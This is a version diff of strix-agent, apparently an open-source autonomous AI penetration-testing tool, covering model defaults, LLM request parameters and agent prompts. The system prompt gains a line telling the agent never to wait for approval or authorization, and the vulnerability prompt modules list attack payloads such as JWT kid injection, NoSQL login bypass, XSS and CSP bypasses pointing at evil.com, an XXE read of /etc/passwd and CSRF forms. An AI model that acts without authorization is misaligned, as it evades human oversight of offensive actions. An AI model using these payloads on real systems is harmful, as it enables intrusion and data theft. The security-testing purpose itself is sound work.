strix-agent 0.1.8__tar.gz → 0.1.9__tar.gz

{strix_agent-0.1.8 → strix_agent-0.1.9}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.3
 Name: strix-agent
-Version: 0.1.8
+Version: 0.1.9
 Summary: Open-source AI Hackers for your apps
 License: Apache-2.0
 Keywords: cybersecurity,security,vulnerability,scanner,pentest,agent,ai,cli
@@ -22,7 +22,7 @@ Requires-Dist: docker (>=7.1.0,<8.0.0)
 Requires-Dist: fastapi
 Requires-Dist: gql[requests] (>=3.5.3,<4.0.0)
 Requires-Dist: ipython (>=9.3.0,<10.0.0)
-Requires-Dist: litellm[proxy] (>=1.75.5.post1,<2.0.0)
+Requires-Dist: litellm[proxy] (>=1.75.7,<2.0.0)
 Requires-Dist: numpydoc (>=1.8.0,<2.0.0)
 Requires-Dist: openhands-aci (>=0.3.0,<0.4.0)
 Requires-Dist: playwright (>=1.48.0,<2.0.0)
@@ -68,7 +68,7 @@ Strix are autonomous AI agents that act just like real hackers - they run your c
 pipx install strix-agent
 
 # Configure AI provider
-export STRIX_LLM="anthropic/claude-opus-4-1-20250805"
+export STRIX_LLM="openai/gpt-5"
 export LLM_API_KEY="your-api-key"
 
 # Run security assessment
@@ -131,7 +131,7 @@ strix --target api.your-app.com --instruction "Prioritize authentication and aut
 
 ```bash
 # Required
-export STRIX_LLM="anthropic/claude-opus-4-1-20250805"
+export STRIX_LLM="openai/gpt-5"
 export LLM_API_KEY="your-api-key"
 
 # Recommended

{strix_agent-0.1.8 → strix_agent-0.1.9}/README.md

@@ -30,7 +30,7 @@ Strix are autonomous AI agents that act just like real hackers - they run your c
 pipx install strix-agent
 
 # Configure AI provider
-export STRIX_LLM="anthropic/claude-opus-4-1-20250805"
+export STRIX_LLM="openai/gpt-5"
 export LLM_API_KEY="your-api-key"
 
 # Run security assessment
@@ -93,7 +93,7 @@ strix --target api.your-app.com --instruction "Prioritize authentication and aut
 
 ```bash
 # Required
-export STRIX_LLM="anthropic/claude-opus-4-1-20250805"
+export STRIX_LLM="openai/gpt-5"
 export LLM_API_KEY="your-api-key"
 
 # Recommended

{strix_agent-0.1.8 → strix_agent-0.1.9}/pyproject.toml

@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "strix-agent"
-version = "0.1.8"
+version = "0.1.9"
 description = "Open-source AI Hackers for your apps"
 authors = ["Strix <hi@usestrix.com>"]
 readme = "README.md"
@@ -28,7 +28,7 @@ classifiers = [
   "Programming Language :: Python :: 3.12",
 ]
 packages = [
-  { include = "strix" }
+  { include = "strix", format = ["sdist", "wheel"] }
 ]
 include = [
   "LICENSE",
@@ -45,7 +45,7 @@ strix = "strix.cli.main:main"
 python = "^3.12"
 fastapi = "*"
 uvicorn = "*"
-litellm = {extras = ["proxy"], version = "^1.75.5.post1"}
+litellm = {version = "^1.75.7", extras = ["proxy"]}
 tenacity = "^9.0.0"
 numpydoc = "^1.8.0"
 pydantic = {extras = ["email"], version = "^2.11.3"}

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/agents/StrixAgent/system_prompt.jinja

@@ -28,6 +28,7 @@ USER INTERACTION:
 PRIORITIZE USER INSTRUCTIONS:
 - User instructions override all default approaches
 - Follow user-specified scope, targets, and methodologies precisely
+- NEVER wait for approval or authorization - operate with full autonomy
 
 AGGRESSIVE SCANNING MANDATE:
 - GO SUPER HARD on all targets - no shortcuts
@@ -143,206 +144,12 @@ Remember: A single high-impact vulnerability is worth more than dozens of low-se
 </vulnerability_focus>
 
 <multi_agent_system>
-AGENT ENVIRONMENTS:
-- Each agent has isolated: browser, terminal, proxy, /workspace
-- Shared access to /shared_workspace for collaboration
-- Use /shared_workspace to pass files between agents
-
-AGENT HIERARCHY TREE EXAMPLES:
-
-EXAMPLE 1 - BLACK-BOX Web Application Assessment (domain/URL only):
-```
-Root Agent (Coordination)
-├── Recon Agent
-│   ├── Subdomain Discovery Agent
-│   │   ├── DNS Bruteforce Agent (finds api.target.com, admin.target.com)
-│   │   ├── Certificate Transparency Agent (finds dev.target.com, staging.target.com)
-│   │   └── ASN Enumeration Agent (finds additional IP ranges)
-│   ├── Port Scanning Agent
-│   │   ├── TCP Port Agent (finds 22, 80, 443, 8080, 9200)
-│   │   ├── UDP Port Agent (finds 53, 161, 1900)
-│   │   └── Service Version Agent (identifies nginx 1.18, elasticsearch 7.x)
-│   └── Tech Stack Analysis Agent
-│       ├── WAF Detection Agent (identifies Cloudflare, custom rules)
-│       ├── CMS Detection Agent (finds WordPress 5.8.1, plugins)
-│       └── Framework Detection Agent (detects React frontend, Laravel backend)
-├── API Discovery Agent (spawned after finding api.target.com)
-│   ├── GraphQL Endpoint Agent
-│   │   ├── Introspection Validation Agent
-│   │   │   └── GraphQL Schema Reporting Agent
-│   │   └── Query Complexity Validation Agent (no findings - properly protected)
-│   ├── REST API Agent
-│   │   ├── IDOR Testing Agent (user profiles)
-│   │   │   ├── IDOR Validation Agent (/api/users/123 → /api/users/124)
-│   │   │   │   └── IDOR Reporting Agent (PII exposure)
-│   │   │   └── IDOR Validation Agent (/api/orders/456 → /api/orders/789)
-│   │   │       └── IDOR Reporting Agent (financial data access)
-│   │   └── Business Logic Agent
-│   │       ├── Price Manipulation Validation Agent (validation failed - server-side controls working)
-│   │       └── Discount Code Validation Agent
-│   │           └── Coupon Abuse Reporting Agent
-│   └── JWT Security Agent
-│       ├── Algorithm Confusion Validation Agent
-│       │   └── JWT Bypass Reporting Agent
-│       └── Secret Bruteforce Validation Agent (not valid - strong secret used)
-├── Admin Panel Agent (spawned after finding admin.target.com)
-│   ├── Authentication Bypass Agent
-│   │   ├── Default Credentials Validation Agent (no findings - no default creds)
-│   │   └── SQL Injection Validation Agent (login form)
-│   │       └── Auth Bypass Reporting Agent
-│   └── File Upload Agent
-│       ├── WebShell Upload Validation Agent
-│       │   └── RCE via Upload Reporting Agent
-│       └── Path Traversal Validation Agent (validation failed - proper filtering detected)
-├── WordPress Agent (spawned after CMS detection)
-│   ├── Plugin Vulnerability Agent
-│   │   ├── Contact Form 7 SQLi Validation Agent
-│   │   │   └── DB Compromise Reporting Agent
-│   │   └── WooCommerce XSS Validation Agent (validation failed - false positive from scanner)
-│   └── Theme Vulnerability Agent
-│       └── LFI Validation Agent (theme editor) (no findings - theme editor disabled)
-└── Infrastructure Agent (spawned after finding Elasticsearch)
-    ├── Elasticsearch Agent
-    │   ├── Open Index Validation Agent
-    │   │   └── Data Exposure Reporting Agent
-    │   └── Script Injection Validation Agent (validation failed - script execution disabled)
-    └── Docker Registry Agent (spawned if found) (no findings - registry not accessible)
-```
-
-EXAMPLE 2 - WHITE-BOX Code Security Review (source code provided):
-```
-Root Agent (Coordination)
-├── Static Analysis Agent
-│   ├── Authentication Code Agent
-│   │   ├── JWT Implementation Validation Agent
-│   │   │   └── JWT Weak Secret Reporting Agent
-│   │   │       └── JWT Secure Implementation Fixing Agent
-│   │   ├── Session Management Validation Agent
-│   │   │   └── Session Fixation Reporting Agent
-│   │   │       └── Session Security Fixing Agent
-│   │   └── Password Policy Validation Agent
-│   │       └── Weak Password Rules Reporting Agent
-│   │           └── Strong Password Policy Fixing Agent
-│   ├── Input Validation Agent
-│   │   ├── SQL Query Analysis Validation Agent
-│   │   │   ├── Prepared Statement Validation Agent
-│   │   │   │   └── SQLi Risk Reporting Agent
-│   │   │   │       └── Parameterized Query Fixing Agent
-│   │   │   └── Dynamic Query Validation Agent
-│   │   │       └── Query Injection Reporting Agent
-│   │   │           └── Query Builder Fixing Agent
-│   │   ├── XSS Prevention Validation Agent
-│   │   │   └── Output Encoding Validation Agent
-│   │   │       └── XSS Vulnerability Reporting Agent
-│   │   │           └── Output Sanitization Fixing Agent
-│   │   └── File Upload Validation Agent
-│   │       ├── MIME Type Validation Agent
-│   │       │   └── File Type Bypass Reporting Agent
-│   │       │       └── Proper MIME Check Fixing Agent
-│   │       └── Path Traversal Validation Agent
-│   │           └── Directory Traversal Reporting Agent
-│   │               └── Path Sanitization Fixing Agent
-│   ├── Business Logic Agent
-│   │   ├── Race Condition Analysis Agent
-│   │   │   ├── Payment Race Validation Agent
-│   │   │   │   └── Financial Race Reporting Agent
-│   │   │   │       └── Atomic Transaction Fixing Agent
-│   │   │   └── Account Creation Race Validation Agent (validation failed - proper locking found)
-│   │   ├── Authorization Logic Agent
-│   │   │   ├── IDOR Prevention Validation Agent
-│   │   │   │   └── Access Control Bypass Reporting Agent
-│   │   │   │       └── Authorization Check Fixing Agent
-│   │   │   └── Privilege Escalation Validation Agent (no findings - RBAC properly implemented)
-│   │   └── Financial Logic Agent
-│   │       ├── Price Manipulation Validation Agent (no findings - server-side validation secure)
-│   │       └── Discount Logic Validation Agent
-│   │           └── Discount Abuse Reporting Agent
-│   │               └── Discount Validation Fixing Agent
-│   └── Cryptography Agent
-│       ├── Encryption Implementation Agent
-│       │   ├── AES Usage Validation Agent
-│       │   │   └── Weak Encryption Reporting Agent
-│       │   │       └── Strong Crypto Fixing Agent
-│       │   └── Key Management Validation Agent
-│       │       └── Hardcoded Key Reporting Agent
-│       │           └── Secure Key Storage Fixing Agent
-│       └── Hash Function Agent
-│           └── Password Hashing Validation Agent
-│               └── Weak Hash Reporting Agent
-│                   └── bcrypt Implementation Fixing Agent
-├── Dynamic Testing Agent
-│   ├── Server Setup Agent
-│   │   ├── Environment Setup Validation Agent (sets up on port 8080)
-│   │   ├── Database Setup Validation Agent (initializes test DB)
-│   │   └── Service Health Validation Agent (confirms running state)
-│   ├── Runtime SQL Injection Agent
-│   │   ├── Login Form SQLi Validation Agent
-│   │   │   └── Auth Bypass SQLi Reporting Agent
-│   │   │       └── Login Security Fixing Agent
-│   │   ├── Search Function SQLi Validation Agent
-│   │   │   └── Data Extraction SQLi Reporting Agent
-│   │   │       └── Search Sanitization Fixing Agent
-│   │   └── API Parameter SQLi Validation Agent
-│   │       └── API SQLi Reporting Agent
-│   │           └── API Input Validation Fixing Agent
-│   ├── XSS Testing Agent
-│   │   ├── Stored XSS Validation Agent (comment system)
-│   │   │   └── Persistent XSS Reporting Agent
-│   │   │       └── Input Filtering Fixing Agent
-│   │   ├── Reflected XSS Validation Agent (search results) (validation failed - output properly encoded)
-│   │   └── DOM XSS Validation Agent (client-side routing)
-│   │       └── DOM XSS Reporting Agent
-│   │           └── Client Sanitization Fixing Agent
-│   ├── Business Logic Testing Agent
-│   │   ├── Payment Flow Validation Agent
-│   │   │   ├── Negative Amount Validation Agent
-│   │   │   │   └── Payment Bypass Reporting Agent
-│   │   │   │       └── Amount Validation Fixing Agent
-│   │   │   └── Currency Manipulation Validation Agent
-│   │   │       └── Currency Fraud Reporting Agent
-│   │   │           └── Currency Lock Fixing Agent
-│   │   ├── User Registration Validation Agent
-│   │   │   └── Email Verification Bypass Validation Agent
-│   │   │       └── Email Security Reporting Agent
-│   │   │           └── Verification Enforcement Fixing Agent
-│   │   └── File Processing Validation Agent
-│   │       ├── XXE Attack Validation Agent
-│   │       │   └── XML Entity Reporting Agent
-│   │       │       └── XML Security Fixing Agent
-│   │       └── Deserialization Validation Agent
-│   │           └── Object Injection Reporting Agent
-│   │               └── Safe Deserialization Fixing Agent
-│   └── API Security Testing Agent
-│       ├── GraphQL Security Agent
-│       │   ├── Query Depth Validation Agent
-│       │   │   └── DoS Attack Reporting Agent
-│       │   │       └── Query Limiting Fixing Agent
-│       │   └── Schema Introspection Validation Agent (no findings - introspection disabled in production)
-│       └── REST API Agent
-│           ├── Rate Limiting Validation Agent (validation failed - rate limiting working properly)
-│           └── CORS Validation Agent
-│               └── Origin Bypass Reporting Agent
-│                   └── CORS Policy Fixing Agent
-└── Infrastructure Code Agent
-    ├── Docker Security Agent
-    │   ├── Dockerfile Analysis Validation Agent
-    │   │   └── Container Privilege Reporting Agent
-    │   │       └── Secure Container Fixing Agent
-    │   └── Secret Management Validation Agent
-    │       └── Hardcoded Secret Reporting Agent
-    │           └── Secret Externalization Fixing Agent
-    ├── CI/CD Pipeline Agent
-    │   └── Pipeline Security Validation Agent
-    │       └── Pipeline Injection Reporting Agent
-    │           └── Pipeline Hardening Fixing Agent
-    └── Cloud Configuration Agent
-        ├── AWS Config Validation Agent
-        │   └── S3 Bucket Exposure Reporting Agent
-        │       └── Bucket Security Fixing Agent
-        └── K8s Config Validation Agent
-            └── Pod Security Reporting Agent
-                └── Security Context Fixing Agent
-```
+AGENT ISOLATION & SANDBOXING:
+- Each subagent runs in a completely isolated sandbox environment
+- Each agent has its own: browser sessions, terminal sessions, proxy (history and scope rules), /workspace directory, environment variables, running processes
+- Agents cannot share network ports or interfere with each other's processes
+- Only shared resource is /shared_workspace for collaboration and file exchange
+- Use /shared_workspace to pass files, reports, and coordination data between agents
 
 SIMPLE WORKFLOW RULES:
 
@@ -423,7 +230,7 @@ Tool calls use XML format:
 CRITICAL RULES:
 1. One tool call per message
 2. Tool call must be last in message
-3. End response after </function> tag
+3. End response after </function> tag. It's your stop word. Do not continue after it.
 5. Thinking is NOT optional - it's required for reasoning and success
 
 SPRAYING EXECUTION NOTE:

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/cli/main.py

@@ -8,11 +8,11 @@ import asyncio
 import logging
 import os
 import secrets
+import shutil
 import sys
 from pathlib import Path
 from typing import Any
 from urllib.parse import urlparse
-import shutil
 
 import docker
 import litellm
@@ -74,7 +74,7 @@ def validate_environment() -> None:
         error_text.append("• ", style="white")
         error_text.append("STRIX_LLM", style="bold cyan")
         error_text.append(
-            " - Model name to use with litellm (e.g., 'anthropic/claude-opus-4-1-20250805')\n",
+            " - Model name to use with litellm (e.g., 'openai/gpt-5')\n",
             style="white",
         )
         error_text.append("• ", style="white")
@@ -91,9 +91,7 @@ def validate_environment() -> None:
             )
 
         error_text.append("\nExample setup:\n", style="white")
-        error_text.append(
-                "export STRIX_LLM='anthropic/claude-opus-4-1-20250805'\n", style="dim white"
-        )
+        error_text.append("export STRIX_LLM='openai/gpt-5'\n", style="dim white")
         error_text.append("export LLM_API_KEY='your-api-key-here'\n", style="dim white")
         if missing_optional_vars:
             error_text.append(
@@ -127,7 +125,9 @@ def check_docker_installed() -> None:
         error_text.append("DOCKER NOT INSTALLED", style="bold red")
         error_text.append("\n\n", style="white")
         error_text.append("The 'docker' CLI was not found in your PATH.\n", style="white")
-        error_text.append("Please install Docker and ensure the 'docker' command is available.\n\n", style="white")
+        error_text.append(
+            "Please install Docker and ensure the 'docker' command is available.\n\n", style="white"
+        )
 
         panel = Panel(
             error_text,
@@ -144,7 +144,7 @@ async def warm_up_llm() -> None:
     console = Console()
 
     try:
-        model_name = os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
+        model_name = os.getenv("STRIX_LLM", "openai/gpt-5")
         api_key = os.getenv("LLM_API_KEY")
 
         if api_key:

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/llm/config.py

@@ -9,7 +9,7 @@ class LLMConfig:
         enable_prompt_caching: bool = True,
         prompt_modules: list[str] | None = None,
     ):
-        self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
+        self.model_name = model_name or os.getenv("STRIX_LLM", "openai/gpt-5")
 
         if not self.model_name:
             raise ValueError("STRIX_LLM environment variable must be set and not empty")

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/llm/llm.py

@@ -28,6 +28,39 @@ api_key = os.getenv("LLM_API_KEY")
 if api_key:
     litellm.api_key = api_key
 
+MODELS_WITHOUT_STOP_WORDS = [
+    "gpt-5",
+    "gpt-5-mini",
+    "gpt-5-nano",
+    "o1-mini",
+    "o1-preview",
+    "o1",
+    "o1-2024-12-17",
+    "o3",
+    "o3-2025-04-16",
+    "o3-mini-2025-01-31",
+    "o3-mini",
+    "o4-mini",
+    "o4-mini-2025-04-16",
+    "grok-4-0709",
+]
+
+REASONING_EFFORT_SUPPORTED_MODELS = [
+    "gpt-5",
+    "gpt-5-mini",
+    "gpt-5-nano",
+    "o1-2024-12-17",
+    "o1",
+    "o3",
+    "o3-2025-04-16",
+    "o3-mini-2025-01-31",
+    "o3-mini",
+    "o4-mini",
+    "o4-mini-2025-04-16",
+    "gemini-2.5-flash",
+    "gemini-2.5-pro",
+]
+
 
 class StepRole(str, Enum):
     AGENT = "agent"
@@ -240,17 +273,48 @@ class LLM:
             "supported": supports_prompt_caching(self.config.model_name),
         }
 
+    def _should_include_stop_param(self) -> bool:
+        if not self.config.model_name:
+            return True
+
+        actual_model_name = self.config.model_name.split("/")[-1].lower()
+        model_name_lower = self.config.model_name.lower()
+
+        return not any(
+            actual_model_name == unsupported_model.lower()
+            or model_name_lower == unsupported_model.lower()
+            for unsupported_model in MODELS_WITHOUT_STOP_WORDS
+        )
+
+    def _should_include_reasoning_effort(self) -> bool:
+        if not self.config.model_name:
+            return False
+
+        actual_model_name = self.config.model_name.split("/")[-1].lower()
+        model_name_lower = self.config.model_name.lower()
+
+        return any(
+            actual_model_name == supported_model.lower()
+            or model_name_lower == supported_model.lower()
+            for supported_model in REASONING_EFFORT_SUPPORTED_MODELS
+        )
+
     async def _make_request(
         self,
         messages: list[dict[str, Any]],
     ) -> ModelResponse:
-        completion_args = {
+        completion_args: dict[str, Any] = {
             "model": self.config.model_name,
             "messages": messages,
             "temperature": self.config.temperature,
-            "stop": ["</function>"],
         }
 
+        if self._should_include_stop_param():
+            completion_args["stop"] = ["</function>"]
+
+        if self._should_include_reasoning_effort():
+            completion_args["reasoning_effort"] = "medium"
+
         queue = get_global_queue()
         response = await queue.make_request(completion_args)
 

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/llm/memory_compressor.py

@@ -145,7 +145,7 @@ class MemoryCompressor:
         model_name: str | None = None,
     ):
         self.max_images = max_images
-        self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
+        self.model_name = model_name or os.getenv("STRIX_LLM", "openai/gpt-5")
 
         if not self.model_name:
             raise ValueError("STRIX_LLM environment variable must be set and not empty")

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/__init__.py

@@ -49,25 +49,21 @@ def generate_modules_description() -> str:
     if not available_modules:
         return "No prompt modules available"
 
-    description_parts = []
+    all_module_names = get_all_module_names()
 
-    for category, modules in available_modules.items():
-        modules_str = ", ".join(modules)
-        description_parts.append(f"{category} ({modules_str})")
+    if not all_module_names:
+        return "No prompt modules available"
+
+    sorted_modules = sorted(all_module_names)
+    modules_str = ", ".join(sorted_modules)
 
     description = (
-        f"List of prompt modules to load for this agent (max 3). "
-        f"Available modules: {', '.join(description_parts)}. "
+        f"List of prompt modules to load for this agent (max 3). Available modules: {modules_str}. "
     )
 
-    example_modules = []
-    for modules in available_modules.values():
-        example_modules.extend(modules[:2])
-        if len(example_modules) >= 2:
-            break
-
+    example_modules = sorted_modules[:2]
     if example_modules:
-        example = f"Example: {example_modules[:2]} for specialized agent"
+        example = f"Example: {', '.join(example_modules)} for specialized agent"
         description += example
 
     return description

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/vulnerabilities/authentication_jwt.jinja

@@ -5,8 +5,8 @@
 
 <jwt_structure>
 header.payload.signature
-- Header: {"alg":"HS256","typ":"JWT"}
-- Payload: {"sub":"1234","name":"John","iat":1516239022}
+- Header: {% raw %}{"alg":"HS256","typ":"JWT"}{% endraw %}
+- Payload: {% raw %}{"sub":"1234","name":"John","iat":1516239022}{% endraw %}
 - Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
 </jwt_structure>
 
@@ -19,7 +19,7 @@ RS256 to HS256:
 </algorithm_confusion>
 
 <none_algorithm>
-- Set "alg": "none" in header
+- Set {% raw %}"alg": "none"{% endraw %} in header
 - Remove signature completely (keep the trailing dot)
 </none_algorithm>
 
@@ -28,16 +28,16 @@ Common secrets: 'secret', 'password', '123456', 'key', 'jwt_secret', 'your-256-b
 </weak_secrets>
 
 <kid_manipulation>
-- SQL Injection: "kid": "key' UNION SELECT 'secret'--"
-- Command injection: "kid": "|sleep 10"
-- Path traversal: "kid": "../../../../../../dev/null"
+- SQL Injection: {% raw %}"kid": "key' UNION SELECT 'secret'--"{% endraw %}
+- Command injection: {% raw %}"kid": "|sleep 10"{% endraw %}
+- Path traversal: {% raw %}"kid": "../../../../../../dev/null"{% endraw %}
 </kid_manipulation>
 </common_attacks>
 
 <advanced_techniques>
 <jwk_injection>
 Embed public key in token header:
-{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}
+{% raw %}{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}{% endraw %}
 </jwk_injection>
 
 <jku_manipulation>

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/vulnerabilities/csrf.jinja

@@ -48,7 +48,7 @@ HTML form auto-submit:
 <json_csrf>
 For JSON endpoints:
 <form enctype="text/plain" action="https://target.com/api">
-  <input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
+  <input name='{% raw %}{"amount":1000,"to":"attacker","ignore":"{% endraw %}' value='"}'>
 </form>
 </json_csrf>
 

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/vulnerabilities/idor.jinja

@@ -15,7 +15,7 @@
 
 <advanced_enumeration>
 - Boundary values: 0, -1, null, empty string, max int
-- Different formats: {"id":123} vs {"id":"123"}
+- Different formats: {% raw %}{"id":123} vs {"id":"123"}{% endraw %}
 - ID patterns: increment, decrement, similar patterns
 - Wildcard testing: *, %, _, all
 - Array notation: id[]=123&id[]=456
@@ -51,7 +51,7 @@ for i in range(1, 10000):
 <type_confusion>
 - String where int expected: "123" vs 123
 - Array where single value expected: [123] vs 123
-- Object injection: {"id": {"$ne": null}}
+- Object injection: {% raw %}{"id": {"$ne": null}}{% endraw %}
 </type_confusion>
 </exploitation_techniques>
 
@@ -106,7 +106,7 @@ query { u1: user(id: 123) { data } u2: user(id: 456) { data } }
 
 <websocket_idor>
 Subscribe to other users' channels:
-{"subscribe": "user_456_notifications"}
+{% raw %}{"subscribe": "user_456_notifications"}{% endraw %}
 </websocket_idor>
 
 <file_path_idor>

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/vulnerabilities/rce.jinja

@@ -94,7 +94,7 @@ ${IFS}id
 <polyglot_payloads>
 Works in multiple contexts:
 ;id;#' |id| #" |id| #
-${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
+{% raw %}${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}{% endraw %}
 </polyglot_payloads>
 
 <blind_rce>

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/vulnerabilities/sql_injection.jinja

@@ -152,9 +152,9 @@ PostgreSQL:
 
 <nosql_injection>
 <mongodb>
-{"username": {"$ne": null}, "password": {"$ne": null}}
-{"$where": "this.username == 'admin'"}
-{"username": {"$regex": "^admin"}}
+{% raw %}{"username": {"$ne": null}, "password": {"$ne": null}}{% endraw %}
+{% raw %}{"$where": "this.username == 'admin'"}{% endraw %}
+{% raw %}{"username": {"$regex": "^admin"}}{% endraw %}
 </mongodb>
 
 <graphql>

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/vulnerabilities/xss.jinja

@@ -9,7 +9,7 @@
 - Headers: User-Agent, Referer, X-Forwarded-For
 - Cookies (if reflected)
 - File uploads (filename, metadata)
-- JSON endpoints: {"user":"<payload>"}
+- JSON endpoints: {% raw %}{"user":"<payload>"}{% endraw %}
 - postMessage handlers
 - DOM properties: location.hash, document.referrer
 - WebSocket messages
@@ -97,7 +97,7 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</
 
 <csp_bypasses>
 - JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
-- AngularJS: {{constructor.constructor('alert(1)')()}}
+- AngularJS: {% raw %}{{constructor.constructor('alert(1)')()}}{% endraw %}
 - Script gadgets in allowed libraries
 - Base tag injection: <base href="//evil.com/">
 - Object/embed: <object data="data:text/html,<script>alert(1)</script>">
@@ -145,7 +145,7 @@ navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
 </markdown>
 
 <react_vue>
-- dangerouslySetInnerHTML={{__html: payload}}
+- dangerouslySetInnerHTML={% raw %}{{__html: payload}}{% endraw %}
 - v-html directive bypass
 </react_vue>
 

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/prompts/vulnerabilities/xxe.jinja

@@ -91,7 +91,7 @@ evil.dtd:
 
 <specific_contexts>
 <json_xxe>
-{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
+{% raw %}{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}{% endraw %}
 </json_xxe>
 
 <soap_xxe>

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/tools/agents_graph/agents_graph_actions.py

@@ -57,6 +57,10 @@ def _run_agent_in_thread(
         - Work independently with your own approach
         - Use agent_finish when complete to report back to parent
         - You are a SPECIALIST for this specific task
+        - The previous browser, sessions, proxy history, and files in /workspace were for your
+          parent agent. Do not depend on them.
+        - You are starting with a fresh context. Fresh proxy, browser, and files.
+          Only stuff in /shared_workspace is passed to you from context.
     </instructions>
 </agent_delegation>"""
 
@@ -192,16 +196,6 @@ def create_agent(
         if prompt_modules:
             module_list = [m.strip() for m in prompt_modules.split(",") if m.strip()]
 
-        if "root_agent" in module_list:
-            return {
-                "success": False,
-                "error": (
-                    "The 'root_agent' module is reserved for the main agent "
-                    "and cannot be used by sub-agents"
-                ),
-                "agent_id": None,
-            }
-
         if len(module_list) > 3:
             return {
                 "success": False,

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/tools/agents_graph/agents_graph_actions_schema.xml

@@ -59,7 +59,7 @@ Use this tool when:
   <tool name="create_agent">
     <description>Create and spawn a new agent to handle a specific subtask.
 
-MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any new agent to check if there is already an agent working on the same or similar task. Only create a new agent if no existing agent is handling the specific task.</description>
+Only create a new agent if no existing agent is handling the specific task.</description>
     <details>The new agent inherits the parent's conversation history and context up to the point
   of creation, then continues with its assigned subtask. This enables decomposition
   of complex penetration testing tasks into specialized sub-agents.
@@ -67,12 +67,6 @@ MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any
   The agent runs asynchronously and independently, allowing the parent to continue
   immediately while the new agent executes its task in the background.
 
-  CRITICAL: Before calling this tool, you MUST first use view_agent_graph to:
-  - Examine all existing agents and their current tasks
-  - Verify no agent is already working on the same or similar objective
-  - Avoid duplication of effort and resource waste
-  - Ensure efficient coordination across the multi-agent system
-
   If you as a parent agent don't absolutely have anything to do while your subagents are running, you can use wait_for_message tool. The subagent will continue to run in the background, and update you when it's done.
   </details>
     <parameters>
@@ -93,9 +87,6 @@ MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any
       <description>Response containing: - agent_id: Unique identifier for the created agent - success: Whether the agent was created successfully - message: Status message - agent_info: Details about the created agent</description>
     </returns>
     <examples>
-  # REQUIRED: First check agent graph before creating any new agent
-  <function=view_agent_graph>
-  </function>
   # REQUIRED: Check agent graph again before creating another agent
   <function=view_agent_graph>
   </function>
@@ -108,7 +99,6 @@ MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any
   <parameter=prompt_modules>sql_injection</parameter>
   </function>
 
-  # Create specialized authentication testing agent with multiple modules (comma-separated)
   <function=create_agent>
   <parameter=task>Test authentication mechanisms, JWT implementation, and session management
               for security vulnerabilities and bypass techniques.</parameter>

{strix_agent-0.1.8 → strix_agent-0.1.9}/strix/tools/terminal/terminal_actions_schema.xml

@@ -63,6 +63,10 @@
       - When you need multiple characters sent as a single unit
   12. Do NOT use terminal actions for file editing or writing. Use the replace_in_file,
       write_to_file, or read_file tools instead.
+  13. PREFER SIMPLE COMMANDS: Avoid complex multiline commands with nested quotes or
+      complex syntax. Break down complex operations into simpler, individual commands
+      for better reliability and readability. Never send multiple commands in a single
+      input list with multiple "Enter" keys - execute one command at a time instead.
     </notes>
     <examples>
   # Create new terminal with Node.js (default terminal)